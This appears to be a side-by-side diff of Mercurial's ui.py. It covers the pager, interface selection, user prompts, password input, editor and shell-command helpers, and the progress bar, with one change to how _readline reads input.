1074 # gracefully and tell the user about their broken pager.
1074 # gracefully and tell the user about their broken pager.
1075 shell = any(c in command for c in "|&;<>()$`\\\"' \t\n*?[#~=%")
1075 shell = any(c in command for c in "|&;<>()$`\\\"' \t\n*?[#~=%")
1076
1076
1077 if pycompat.iswindows and not shell:
1077 if pycompat.iswindows and not shell:
1078 # Window's built-in `more` cannot be invoked with shell=False, but
1078 # Window's built-in `more` cannot be invoked with shell=False, but
1079 # its `more.com` can. Hide this implementation detail from the
1079 # its `more.com` can. Hide this implementation detail from the
1080 # user so we can also get sane bad PAGER behavior. MSYS has
1080 # user so we can also get sane bad PAGER behavior. MSYS has
1081 # `more.exe`, so do a cmd.exe style resolution of the executable to
1081 # `more.exe`, so do a cmd.exe style resolution of the executable to
1082 # determine which one to use.
1082 # determine which one to use.
1083 fullcmd = util.findexe(command)
1083 fullcmd = util.findexe(command)
1084 if not fullcmd:
1084 if not fullcmd:
1085 self.warn(_("missing pager command '%s', skipping pager\n")
1085 self.warn(_("missing pager command '%s', skipping pager\n")
1086 % command)
1086 % command)
1087 return False
1087 return False
1088
1088
1089 command = fullcmd
1089 command = fullcmd
1090
1090
1091 try:
1091 try:
1092 pager = subprocess.Popen(
1092 pager = subprocess.Popen(
1093 command, shell=shell, bufsize=-1,
1093 command, shell=shell, bufsize=-1,
1094 close_fds=util.closefds, stdin=subprocess.PIPE,
1094 close_fds=util.closefds, stdin=subprocess.PIPE,
1095 stdout=util.stdout, stderr=util.stderr,
1095 stdout=util.stdout, stderr=util.stderr,
1096 env=util.shellenviron(env))
1096 env=util.shellenviron(env))
1097 except OSError as e:
1097 except OSError as e:
1098 if e.errno == errno.ENOENT and not shell:
1098 if e.errno == errno.ENOENT and not shell:
1099 self.warn(_("missing pager command '%s', skipping pager\n")
1099 self.warn(_("missing pager command '%s', skipping pager\n")
1100 % command)
1100 % command)
1101 return False
1101 return False
1102 raise
1102 raise
1103
1103
1104 # back up original file descriptors
1104 # back up original file descriptors
1105 stdoutfd = os.dup(util.stdout.fileno())
1105 stdoutfd = os.dup(util.stdout.fileno())
1106 stderrfd = os.dup(util.stderr.fileno())
1106 stderrfd = os.dup(util.stderr.fileno())
1107
1107
1108 os.dup2(pager.stdin.fileno(), util.stdout.fileno())
1108 os.dup2(pager.stdin.fileno(), util.stdout.fileno())
1109 if self._isatty(util.stderr):
1109 if self._isatty(util.stderr):
1110 os.dup2(pager.stdin.fileno(), util.stderr.fileno())
1110 os.dup2(pager.stdin.fileno(), util.stderr.fileno())
1111
1111
1112 @self.atexit
1112 @self.atexit
1113 def killpager():
1113 def killpager():
1114 if util.safehasattr(signal, "SIGINT"):
1114 if util.safehasattr(signal, "SIGINT"):
1115 signal.signal(signal.SIGINT, signal.SIG_IGN)
1115 signal.signal(signal.SIGINT, signal.SIG_IGN)
1116 # restore original fds, closing pager.stdin copies in the process
1116 # restore original fds, closing pager.stdin copies in the process
1117 os.dup2(stdoutfd, util.stdout.fileno())
1117 os.dup2(stdoutfd, util.stdout.fileno())
1118 os.dup2(stderrfd, util.stderr.fileno())
1118 os.dup2(stderrfd, util.stderr.fileno())
1119 pager.stdin.close()
1119 pager.stdin.close()
1120 pager.wait()
1120 pager.wait()
1121
1121
1122 return True
1122 return True
1123
1123
1124 @property
1124 @property
1125 def _exithandlers(self):
1125 def _exithandlers(self):
1126 return _reqexithandlers
1126 return _reqexithandlers
1127
1127
1128 def atexit(self, func, *args, **kwargs):
1128 def atexit(self, func, *args, **kwargs):
1129 '''register a function to run after dispatching a request
1129 '''register a function to run after dispatching a request
1130
1130
1131 Handlers do not stay registered across request boundaries.'''
1131 Handlers do not stay registered across request boundaries.'''
1132 self._exithandlers.append((func, args, kwargs))
1132 self._exithandlers.append((func, args, kwargs))
1133 return func
1133 return func
1134
1134
1135 def interface(self, feature):
1135 def interface(self, feature):
1136 """what interface to use for interactive console features?
1136 """what interface to use for interactive console features?
1137
1137
1138 The interface is controlled by the value of `ui.interface` but also by
1138 The interface is controlled by the value of `ui.interface` but also by
1139 the value of feature-specific configuration. For example:
1139 the value of feature-specific configuration. For example:
1140
1140
1141 ui.interface.histedit = text
1141 ui.interface.histedit = text
1142 ui.interface.chunkselector = curses
1142 ui.interface.chunkselector = curses
1143
1143
1144 Here the features are "histedit" and "chunkselector".
1144 Here the features are "histedit" and "chunkselector".
1145
1145
1146 The configuration above means that the default interfaces for commands
1146 The configuration above means that the default interfaces for commands
1147 is curses, the interface for histedit is text and the interface for
1147 is curses, the interface for histedit is text and the interface for
1148 selecting chunk is crecord (the best curses interface available).
1148 selecting chunk is crecord (the best curses interface available).
1149
1149
1150 Consider the following example:
1150 Consider the following example:
1151 ui.interface = curses
1151 ui.interface = curses
1152 ui.interface.histedit = text
1152 ui.interface.histedit = text
1153
1153
1154 Then histedit will use the text interface and chunkselector will use
1154 Then histedit will use the text interface and chunkselector will use
1155 the default curses interface (crecord at the moment).
1155 the default curses interface (crecord at the moment).
1156 """
1156 """
1157 alldefaults = frozenset(["text", "curses"])
1157 alldefaults = frozenset(["text", "curses"])
1158
1158
1159 featureinterfaces = {
1159 featureinterfaces = {
1160 "chunkselector": [
1160 "chunkselector": [
1161 "text",
1161 "text",
1162 "curses",
1162 "curses",
1163 ]
1163 ]
1164 }
1164 }
1165
1165
1166 # Feature-specific interface
1166 # Feature-specific interface
1167 if feature not in featureinterfaces.keys():
1167 if feature not in featureinterfaces.keys():
1168 # Programming error, not user error
1168 # Programming error, not user error
1169 raise ValueError("Unknown feature requested %s" % feature)
1169 raise ValueError("Unknown feature requested %s" % feature)
1170
1170
1171 availableinterfaces = frozenset(featureinterfaces[feature])
1171 availableinterfaces = frozenset(featureinterfaces[feature])
1172 if alldefaults > availableinterfaces:
1172 if alldefaults > availableinterfaces:
1173 # Programming error, not user error. We need a use case to
1173 # Programming error, not user error. We need a use case to
1174 # define the right thing to do here.
1174 # define the right thing to do here.
1175 raise ValueError(
1175 raise ValueError(
1176 "Feature %s does not handle all default interfaces" %
1176 "Feature %s does not handle all default interfaces" %
1177 feature)
1177 feature)
1178
1178
1179 if self.plain():
1179 if self.plain():
1180 return "text"
1180 return "text"
1181
1181
1182 # Default interface for all the features
1182 # Default interface for all the features
1183 defaultinterface = "text"
1183 defaultinterface = "text"
1184 i = self.config("ui", "interface")
1184 i = self.config("ui", "interface")
1185 if i in alldefaults:
1185 if i in alldefaults:
1186 defaultinterface = i
1186 defaultinterface = i
1187
1187
1188 choseninterface = defaultinterface
1188 choseninterface = defaultinterface
1189 f = self.config("ui", "interface.%s" % feature)
1189 f = self.config("ui", "interface.%s" % feature)
1190 if f in availableinterfaces:
1190 if f in availableinterfaces:
1191 choseninterface = f
1191 choseninterface = f
1192
1192
1193 if i is not None and defaultinterface != i:
1193 if i is not None and defaultinterface != i:
1194 if f is not None:
1194 if f is not None:
1195 self.warn(_("invalid value for ui.interface: %s\n") %
1195 self.warn(_("invalid value for ui.interface: %s\n") %
1196 (i,))
1196 (i,))
1197 else:
1197 else:
1198 self.warn(_("invalid value for ui.interface: %s (using %s)\n") %
1198 self.warn(_("invalid value for ui.interface: %s (using %s)\n") %
1199 (i, choseninterface))
1199 (i, choseninterface))
1200 if f is not None and choseninterface != f:
1200 if f is not None and choseninterface != f:
1201 self.warn(_("invalid value for ui.interface.%s: %s (using %s)\n") %
1201 self.warn(_("invalid value for ui.interface.%s: %s (using %s)\n") %
1202 (feature, f, choseninterface))
1202 (feature, f, choseninterface))
1203
1203
1204 return choseninterface
1204 return choseninterface
1205
1205
1206 def interactive(self):
1206 def interactive(self):
1207 '''is interactive input allowed?
1207 '''is interactive input allowed?
1208
1208
1209 An interactive session is a session where input can be reasonably read
1209 An interactive session is a session where input can be reasonably read
1210 from `sys.stdin'. If this function returns false, any attempt to read
1210 from `sys.stdin'. If this function returns false, any attempt to read
1211 from stdin should fail with an error, unless a sensible default has been
1211 from stdin should fail with an error, unless a sensible default has been
1212 specified.
1212 specified.
1213
1213
1214 Interactiveness is triggered by the value of the `ui.interactive'
1214 Interactiveness is triggered by the value of the `ui.interactive'
1215 configuration variable or - if it is unset - when `sys.stdin' points
1215 configuration variable or - if it is unset - when `sys.stdin' points
1216 to a terminal device.
1216 to a terminal device.
1217
1217
1218 This function refers to input only; for output, see `ui.formatted()'.
1218 This function refers to input only; for output, see `ui.formatted()'.
1219 '''
1219 '''
1220 i = self.configbool("ui", "interactive")
1220 i = self.configbool("ui", "interactive")
1221 if i is None:
1221 if i is None:
1222 # some environments replace stdin without implementing isatty
1222 # some environments replace stdin without implementing isatty
1223 # usually those are non-interactive
1223 # usually those are non-interactive
1224 return self._isatty(self.fin)
1224 return self._isatty(self.fin)
1225
1225
1226 return i
1226 return i
1227
1227
1228 def termwidth(self):
1228 def termwidth(self):
1229 '''how wide is the terminal in columns?
1229 '''how wide is the terminal in columns?
1230 '''
1230 '''
1231 if 'COLUMNS' in encoding.environ:
1231 if 'COLUMNS' in encoding.environ:
1232 try:
1232 try:
1233 return int(encoding.environ['COLUMNS'])
1233 return int(encoding.environ['COLUMNS'])
1234 except ValueError:
1234 except ValueError:
1235 pass
1235 pass
1236 return scmutil.termsize(self)[0]
1236 return scmutil.termsize(self)[0]
1237
1237
1238 def formatted(self):
1238 def formatted(self):
1239 '''should formatted output be used?
1239 '''should formatted output be used?
1240
1240
1241 It is often desirable to format the output to suite the output medium.
1241 It is often desirable to format the output to suite the output medium.
1242 Examples of this are truncating long lines or colorizing messages.
1242 Examples of this are truncating long lines or colorizing messages.
1243 However, this is not often not desirable when piping output into other
1243 However, this is not often not desirable when piping output into other
1244 utilities, e.g. `grep'.
1244 utilities, e.g. `grep'.
1245
1245
1246 Formatted output is triggered by the value of the `ui.formatted'
1246 Formatted output is triggered by the value of the `ui.formatted'
1247 configuration variable or - if it is unset - when `sys.stdout' points
1247 configuration variable or - if it is unset - when `sys.stdout' points
1248 to a terminal device. Please note that `ui.formatted' should be
1248 to a terminal device. Please note that `ui.formatted' should be
1249 considered an implementation detail; it is not intended for use outside
1249 considered an implementation detail; it is not intended for use outside
1250 Mercurial or its extensions.
1250 Mercurial or its extensions.
1251
1251
1252 This function refers to output only; for input, see `ui.interactive()'.
1252 This function refers to output only; for input, see `ui.interactive()'.
1253 This function always returns false when in plain mode, see `ui.plain()'.
1253 This function always returns false when in plain mode, see `ui.plain()'.
1254 '''
1254 '''
1255 if self.plain():
1255 if self.plain():
1256 return False
1256 return False
1257
1257
1258 i = self.configbool("ui", "formatted")
1258 i = self.configbool("ui", "formatted")
1259 if i is None:
1259 if i is None:
1260 # some environments replace stdout without implementing isatty
1260 # some environments replace stdout without implementing isatty
1261 # usually those are non-interactive
1261 # usually those are non-interactive
1262 return self._isatty(self.fout)
1262 return self._isatty(self.fout)
1263
1263
1264 return i
1264 return i
1265
1265
1266 def _readline(self):
1266 def _readline(self):
1267 if self._isatty(self.fin):
1267 if self._isatty(self.fin):
1268 try:
1268 try:
1269 # magically add command line editing support, where
1269 # magically add command line editing support, where
1270 # available
1270 # available
1271 import readline
1271 import readline
1272 # force demandimport to really load the module
1272 # force demandimport to really load the module
1273 readline.read_history_file
1273 readline.read_history_file
1274 # windows sometimes raises something other than ImportError
1274 # windows sometimes raises something other than ImportError
1275 except Exception:
1275 except Exception:
1276 pass
1276 pass
1277
1277
1278 # prompt ' ' must exist; otherwise readline may delete entire line
1278 # prompt ' ' must exist; otherwise readline may delete entire line
1279 # - http://bugs.python.org/issue12833
1279 # - http://bugs.python.org/issue12833
1280 with self.timeblockedsection('stdio'):
1280 with self.timeblockedsection('stdio'):
1281 line = util.bytesinput(self.fin, self.fout, r' ')
1281 sin, sout = sys.stdin, sys.stdout
1282 try:
1283 sys.stdin = encoding.strio(self.fin)
1284 sys.stdout = encoding.strio(self.fout)
1285 line = encoding.strtolocal(pycompat.rawinput(r' '))
1286 finally:
1287 sys.stdin, sys.stdout = sin, sout
1282
1288
1283 # When stdin is in binary mode on Windows, it can cause
1289 # When stdin is in binary mode on Windows, it can cause
1284 # raw_input() to emit an extra trailing carriage return
1290 # raw_input() to emit an extra trailing carriage return
1285 if pycompat.oslinesep == '\r\n' and line and line[-1] == '\r':
1291 if pycompat.oslinesep == '\r\n' and line and line[-1] == '\r':
1286 line = line[:-1]
1292 line = line[:-1]
1287 return line
1293 return line
1288
1294
1289 def prompt(self, msg, default="y"):
1295 def prompt(self, msg, default="y"):
1290 """Prompt user with msg, read response.
1296 """Prompt user with msg, read response.
1291 If ui is not interactive, the default is returned.
1297 If ui is not interactive, the default is returned.
1292 """
1298 """
1293 if not self.interactive():
1299 if not self.interactive():
1294 self.write(msg, ' ', default or '', "\n")
1300 self.write(msg, ' ', default or '', "\n")
1295 return default
1301 return default
1296 self._writenobuf(msg, label='ui.prompt')
1302 self._writenobuf(msg, label='ui.prompt')
1297 self.flush()
1303 self.flush()
1298 try:
1304 try:
1299 r = self._readline()
1305 r = self._readline()
1300 if not r:
1306 if not r:
1301 r = default
1307 r = default
1302 if self.configbool('ui', 'promptecho'):
1308 if self.configbool('ui', 'promptecho'):
1303 self.write(r, "\n")
1309 self.write(r, "\n")
1304 return r
1310 return r
1305 except EOFError:
1311 except EOFError:
1306 raise error.ResponseExpected()
1312 raise error.ResponseExpected()
1307
1313
1308 @staticmethod
1314 @staticmethod
1309 def extractchoices(prompt):
1315 def extractchoices(prompt):
1310 """Extract prompt message and list of choices from specified prompt.
1316 """Extract prompt message and list of choices from specified prompt.
1311
1317
1312 This returns tuple "(message, choices)", and "choices" is the
1318 This returns tuple "(message, choices)", and "choices" is the
1313 list of tuple "(response character, text without &)".
1319 list of tuple "(response character, text without &)".
1314
1320
1315 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1321 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1316 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1322 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1317 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1323 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1318 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1324 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1319 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1325 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1320 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1326 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1321 """
1327 """
1322
1328
1323 # Sadly, the prompt string may have been built with a filename
1329 # Sadly, the prompt string may have been built with a filename
1324 # containing "$$" so let's try to find the first valid-looking
1330 # containing "$$" so let's try to find the first valid-looking
1325 # prompt to start parsing. Sadly, we also can't rely on
1331 # prompt to start parsing. Sadly, we also can't rely on
1326 # choices containing spaces, ASCII, or basically anything
1332 # choices containing spaces, ASCII, or basically anything
1327 # except an ampersand followed by a character.
1333 # except an ampersand followed by a character.
1328 m = re.match(br'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
1334 m = re.match(br'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
1329 msg = m.group(1)
1335 msg = m.group(1)
1330 choices = [p.strip(' ') for p in m.group(2).split('$$')]
1336 choices = [p.strip(' ') for p in m.group(2).split('$$')]
1331 def choicetuple(s):
1337 def choicetuple(s):
1332 ampidx = s.index('&')
1338 ampidx = s.index('&')
1333 return s[ampidx + 1:ampidx + 2].lower(), s.replace('&', '', 1)
1339 return s[ampidx + 1:ampidx + 2].lower(), s.replace('&', '', 1)
1334 return (msg, [choicetuple(s) for s in choices])
1340 return (msg, [choicetuple(s) for s in choices])
1335
1341
1336 def promptchoice(self, prompt, default=0):
1342 def promptchoice(self, prompt, default=0):
1337 """Prompt user with a message, read response, and ensure it matches
1343 """Prompt user with a message, read response, and ensure it matches
1338 one of the provided choices. The prompt is formatted as follows:
1344 one of the provided choices. The prompt is formatted as follows:
1339
1345
1340 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1346 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1341
1347
1342 The index of the choice is returned. Responses are case
1348 The index of the choice is returned. Responses are case
1343 insensitive. If ui is not interactive, the default is
1349 insensitive. If ui is not interactive, the default is
1344 returned.
1350 returned.
1345 """
1351 """
1346
1352
1347 msg, choices = self.extractchoices(prompt)
1353 msg, choices = self.extractchoices(prompt)
1348 resps = [r for r, t in choices]
1354 resps = [r for r, t in choices]
1349 while True:
1355 while True:
1350 r = self.prompt(msg, resps[default])
1356 r = self.prompt(msg, resps[default])
1351 if r.lower() in resps:
1357 if r.lower() in resps:
1352 return resps.index(r.lower())
1358 return resps.index(r.lower())
1353 self.write(_("unrecognized response\n"))
1359 self.write(_("unrecognized response\n"))
1354
1360
1355 def getpass(self, prompt=None, default=None):
1361 def getpass(self, prompt=None, default=None):
1356 if not self.interactive():
1362 if not self.interactive():
1357 return default
1363 return default
1358 try:
1364 try:
1359 self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
1365 self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
1360 # disable getpass() only if explicitly specified. it's still valid
1366 # disable getpass() only if explicitly specified. it's still valid
1361 # to interact with tty even if fin is not a tty.
1367 # to interact with tty even if fin is not a tty.
1362 with self.timeblockedsection('stdio'):
1368 with self.timeblockedsection('stdio'):
1363 if self.configbool('ui', 'nontty'):
1369 if self.configbool('ui', 'nontty'):
1364 l = self.fin.readline()
1370 l = self.fin.readline()
1365 if not l:
1371 if not l:
1366 raise EOFError
1372 raise EOFError
1367 return l.rstrip('\n')
1373 return l.rstrip('\n')
1368 else:
1374 else:
1369 return getpass.getpass('')
1375 return getpass.getpass('')
1370 except EOFError:
1376 except EOFError:
1371 raise error.ResponseExpected()
1377 raise error.ResponseExpected()
1372 def status(self, *msg, **opts):
1378 def status(self, *msg, **opts):
1373 '''write status message to output (if ui.quiet is False)
1379 '''write status message to output (if ui.quiet is False)
1374
1380
1375 This adds an output label of "ui.status".
1381 This adds an output label of "ui.status".
1376 '''
1382 '''
1377 if not self.quiet:
1383 if not self.quiet:
1378 opts[r'label'] = opts.get(r'label', '') + ' ui.status'
1384 opts[r'label'] = opts.get(r'label', '') + ' ui.status'
1379 self.write(*msg, **opts)
1385 self.write(*msg, **opts)
1380 def warn(self, *msg, **opts):
1386 def warn(self, *msg, **opts):
1381 '''write warning message to output (stderr)
1387 '''write warning message to output (stderr)
1382
1388
1383 This adds an output label of "ui.warning".
1389 This adds an output label of "ui.warning".
1384 '''
1390 '''
1385 opts[r'label'] = opts.get(r'label', '') + ' ui.warning'
1391 opts[r'label'] = opts.get(r'label', '') + ' ui.warning'
1386 self.write_err(*msg, **opts)
1392 self.write_err(*msg, **opts)
1387 def note(self, *msg, **opts):
1393 def note(self, *msg, **opts):
1388 '''write note to output (if ui.verbose is True)
1394 '''write note to output (if ui.verbose is True)
1389
1395
1390 This adds an output label of "ui.note".
1396 This adds an output label of "ui.note".
1391 '''
1397 '''
1392 if self.verbose:
1398 if self.verbose:
1393 opts[r'label'] = opts.get(r'label', '') + ' ui.note'
1399 opts[r'label'] = opts.get(r'label', '') + ' ui.note'
1394 self.write(*msg, **opts)
1400 self.write(*msg, **opts)
1395 def debug(self, *msg, **opts):
1401 def debug(self, *msg, **opts):
1396 '''write debug message to output (if ui.debugflag is True)
1402 '''write debug message to output (if ui.debugflag is True)
1397
1403
1398 This adds an output label of "ui.debug".
1404 This adds an output label of "ui.debug".
1399 '''
1405 '''
1400 if self.debugflag:
1406 if self.debugflag:
1401 opts[r'label'] = opts.get(r'label', '') + ' ui.debug'
1407 opts[r'label'] = opts.get(r'label', '') + ' ui.debug'
1402 self.write(*msg, **opts)
1408 self.write(*msg, **opts)
1403
1409
1404 def edit(self, text, user, extra=None, editform=None, pending=None,
1410 def edit(self, text, user, extra=None, editform=None, pending=None,
1405 repopath=None, action=None):
1411 repopath=None, action=None):
1406 if action is None:
1412 if action is None:
1407 self.develwarn('action is None but will soon be a required '
1413 self.develwarn('action is None but will soon be a required '
1408 'parameter to ui.edit()')
1414 'parameter to ui.edit()')
1409 extra_defaults = {
1415 extra_defaults = {
1410 'prefix': 'editor',
1416 'prefix': 'editor',
1411 'suffix': '.txt',
1417 'suffix': '.txt',
1412 }
1418 }
1413 if extra is not None:
1419 if extra is not None:
1414 if extra.get('suffix') is not None:
1420 if extra.get('suffix') is not None:
1415 self.develwarn('extra.suffix is not None but will soon be '
1421 self.develwarn('extra.suffix is not None but will soon be '
1416 'ignored by ui.edit()')
1422 'ignored by ui.edit()')
1417 extra_defaults.update(extra)
1423 extra_defaults.update(extra)
1418 extra = extra_defaults
1424 extra = extra_defaults
1419
1425
1420 if action == 'diff':
1426 if action == 'diff':
1421 suffix = '.diff'
1427 suffix = '.diff'
1422 elif action:
1428 elif action:
1423 suffix = '.%s.hg.txt' % action
1429 suffix = '.%s.hg.txt' % action
1424 else:
1430 else:
1425 suffix = extra['suffix']
1431 suffix = extra['suffix']
1426
1432
1427 rdir = None
1433 rdir = None
1428 if self.configbool('experimental', 'editortmpinhg'):
1434 if self.configbool('experimental', 'editortmpinhg'):
1429 rdir = repopath
1435 rdir = repopath
1430 (fd, name) = tempfile.mkstemp(prefix='hg-' + extra['prefix'] + '-',
1436 (fd, name) = tempfile.mkstemp(prefix='hg-' + extra['prefix'] + '-',
1431 suffix=suffix,
1437 suffix=suffix,
1432 dir=rdir)
1438 dir=rdir)
1433 try:
1439 try:
1434 f = os.fdopen(fd, r'wb')
1440 f = os.fdopen(fd, r'wb')
1435 f.write(util.tonativeeol(text))
1441 f.write(util.tonativeeol(text))
1436 f.close()
1442 f.close()
1437
1443
1438 environ = {'HGUSER': user}
1444 environ = {'HGUSER': user}
1439 if 'transplant_source' in extra:
1445 if 'transplant_source' in extra:
1440 environ.update({'HGREVISION': hex(extra['transplant_source'])})
1446 environ.update({'HGREVISION': hex(extra['transplant_source'])})
1441 for label in ('intermediate-source', 'source', 'rebase_source'):
1447 for label in ('intermediate-source', 'source', 'rebase_source'):
1442 if label in extra:
1448 if label in extra:
1443 environ.update({'HGREVISION': extra[label]})
1449 environ.update({'HGREVISION': extra[label]})
1444 break
1450 break
1445 if editform:
1451 if editform:
1446 environ.update({'HGEDITFORM': editform})
1452 environ.update({'HGEDITFORM': editform})
1447 if pending:
1453 if pending:
1448 environ.update({'HG_PENDING': pending})
1454 environ.update({'HG_PENDING': pending})
1449
1455
1450 editor = self.geteditor()
1456 editor = self.geteditor()
1451
1457
1452 self.system("%s \"%s\"" % (editor, name),
1458 self.system("%s \"%s\"" % (editor, name),
1453 environ=environ,
1459 environ=environ,
1454 onerr=error.Abort, errprefix=_("edit failed"),
1460 onerr=error.Abort, errprefix=_("edit failed"),
1455 blockedtag='editor')
1461 blockedtag='editor')
1456
1462
1457 f = open(name, r'rb')
1463 f = open(name, r'rb')
1458 t = util.fromnativeeol(f.read())
1464 t = util.fromnativeeol(f.read())
1459 f.close()
1465 f.close()
1460 finally:
1466 finally:
1461 os.unlink(name)
1467 os.unlink(name)
1462
1468
1463 return t
1469 return t
1464
1470
1465 def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None,
1471 def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None,
1466 blockedtag=None):
1472 blockedtag=None):
1467 '''execute shell command with appropriate output stream. command
1473 '''execute shell command with appropriate output stream. command
1468 output will be redirected if fout is not stdout.
1474 output will be redirected if fout is not stdout.
1469
1475
1470 if command fails and onerr is None, return status, else raise onerr
1476 if command fails and onerr is None, return status, else raise onerr
1471 object as exception.
1477 object as exception.
1472 '''
1478 '''
1473 if blockedtag is None:
1479 if blockedtag is None:
1474 # Long cmds tend to be because of an absolute path on cmd. Keep
1480 # Long cmds tend to be because of an absolute path on cmd. Keep
1475 # the tail end instead
1481 # the tail end instead
1476 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1482 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1477 blockedtag = 'unknown_system_' + cmdsuffix
1483 blockedtag = 'unknown_system_' + cmdsuffix
1478 out = self.fout
1484 out = self.fout
1479 if any(s[1] for s in self._bufferstates):
1485 if any(s[1] for s in self._bufferstates):
1480 out = self
1486 out = self
1481 with self.timeblockedsection(blockedtag):
1487 with self.timeblockedsection(blockedtag):
1482 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1488 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1483 if rc and onerr:
1489 if rc and onerr:
1484 errmsg = '%s %s' % (os.path.basename(cmd.split(None, 1)[0]),
1490 errmsg = '%s %s' % (os.path.basename(cmd.split(None, 1)[0]),
1485 util.explainexit(rc)[0])
1491 util.explainexit(rc)[0])
1486 if errprefix:
1492 if errprefix:
1487 errmsg = '%s: %s' % (errprefix, errmsg)
1493 errmsg = '%s: %s' % (errprefix, errmsg)
1488 raise onerr(errmsg)
1494 raise onerr(errmsg)
1489 return rc
1495 return rc
1490
1496
1491 def _runsystem(self, cmd, environ, cwd, out):
1497 def _runsystem(self, cmd, environ, cwd, out):
1492 """actually execute the given shell command (can be overridden by
1498 """actually execute the given shell command (can be overridden by
1493 extensions like chg)"""
1499 extensions like chg)"""
1494 return util.system(cmd, environ=environ, cwd=cwd, out=out)
1500 return util.system(cmd, environ=environ, cwd=cwd, out=out)
1495
1501
1496 def traceback(self, exc=None, force=False):
1502 def traceback(self, exc=None, force=False):
1497 '''print exception traceback if traceback printing enabled or forced.
1503 '''print exception traceback if traceback printing enabled or forced.
1498 only to call in exception handler. returns true if traceback
1504 only to call in exception handler. returns true if traceback
1499 printed.'''
1505 printed.'''
1500 if self.tracebackflag or force:
1506 if self.tracebackflag or force:
1501 if exc is None:
1507 if exc is None:
1502 exc = sys.exc_info()
1508 exc = sys.exc_info()
1503 cause = getattr(exc[1], 'cause', None)
1509 cause = getattr(exc[1], 'cause', None)
1504
1510
1505 if cause is not None:
1511 if cause is not None:
1506 causetb = traceback.format_tb(cause[2])
1512 causetb = traceback.format_tb(cause[2])
1507 exctb = traceback.format_tb(exc[2])
1513 exctb = traceback.format_tb(exc[2])
1508 exconly = traceback.format_exception_only(cause[0], cause[1])
1514 exconly = traceback.format_exception_only(cause[0], cause[1])
1509
1515
1510 # exclude frame where 'exc' was chained and rethrown from exctb
1516 # exclude frame where 'exc' was chained and rethrown from exctb
1511 self.write_err('Traceback (most recent call last):\n',
1517 self.write_err('Traceback (most recent call last):\n',
1512 ''.join(exctb[:-1]),
1518 ''.join(exctb[:-1]),
1513 ''.join(causetb),
1519 ''.join(causetb),
1514 ''.join(exconly))
1520 ''.join(exconly))
1515 else:
1521 else:
1516 output = traceback.format_exception(exc[0], exc[1], exc[2])
1522 output = traceback.format_exception(exc[0], exc[1], exc[2])
1517 self.write_err(encoding.strtolocal(r''.join(output)))
1523 self.write_err(encoding.strtolocal(r''.join(output)))
1518 return self.tracebackflag or force
1524 return self.tracebackflag or force
1519
1525
1520 def geteditor(self):
1526 def geteditor(self):
1521 '''return editor to use'''
1527 '''return editor to use'''
1522 if pycompat.sysplatform == 'plan9':
1528 if pycompat.sysplatform == 'plan9':
1523 # vi is the MIPS instruction simulator on Plan 9. We
1529 # vi is the MIPS instruction simulator on Plan 9. We
1524 # instead default to E to plumb commit messages to
1530 # instead default to E to plumb commit messages to
1525 # avoid confusion.
1531 # avoid confusion.
1526 editor = 'E'
1532 editor = 'E'
1527 else:
1533 else:
1528 editor = 'vi'
1534 editor = 'vi'
1529 return (encoding.environ.get("HGEDITOR") or
1535 return (encoding.environ.get("HGEDITOR") or
1530 self.config("ui", "editor", editor))
1536 self.config("ui", "editor", editor))
1531
1537
1532 @util.propertycache
1538 @util.propertycache
1533 def _progbar(self):
1539 def _progbar(self):
1534 """setup the progbar singleton to the ui object"""
1540 """setup the progbar singleton to the ui object"""
1535 if (self.quiet or self.debugflag
1541 if (self.quiet or self.debugflag
1536 or self.configbool('progress', 'disable')
1542 or self.configbool('progress', 'disable')
1537 or not progress.shouldprint(self)):
1543 or not progress.shouldprint(self)):
1538 return None
1544 return None
1539 return getprogbar(self)
1545 return getprogbar(self)
1540
1546
1541 def _progclear(self):
1547 def _progclear(self):
1542 """clear progress bar output if any. use it before any output"""
1548 """clear progress bar output if any. use it before any output"""
1543 if not haveprogbar(): # nothing loaded yet
1549 if not haveprogbar(): # nothing loaded yet
1544 return
1550 return
1545 if self._progbar is not None and self._progbar.printed:
1551 if self._progbar is not None and self._progbar.printed:
1546 self._progbar.clear()
1552 self._progbar.clear()
1547
1553
1548 def progress(self, topic, pos, item="", unit="", total=None):
1554 def progress(self, topic, pos, item="", unit="", total=None):
1549 '''show a progress message
1555 '''show a progress message
1550
1556
1551 By default a textual progress bar will be displayed if an operation
1557 By default a textual progress bar will be displayed if an operation
1552 takes too long. 'topic' is the current operation, 'item' is a
1558 takes too long. 'topic' is the current operation, 'item' is a
1553 non-numeric marker of the current position (i.e. the currently
1559 non-numeric marker of the current position (i.e. the currently
1554 in-process file), 'pos' is the current numeric position (i.e.
1560 in-process file), 'pos' is the current numeric position (i.e.
1555 revision, bytes, etc.), unit is a corresponding unit label,
1561 revision, bytes, etc.), unit is a corresponding unit label,
1556 and total is the highest expected pos.
1562 and total is the highest expected pos.
1557
1563
1558 Multiple nested topics may be active at a time.
1564 Multiple nested topics may be active at a time.
1559
1565
1560 All topics should be marked closed by setting pos to None at
1566 All topics should be marked closed by setting pos to None at
1561 termination.
1567 termination.
1562 '''
1568 '''
1563 if self._progbar is not None:
1569 if self._progbar is not None:
1564 self._progbar.progress(topic, pos, item=item, unit=unit,
1570 self._progbar.progress(topic, pos, item=item, unit=unit,
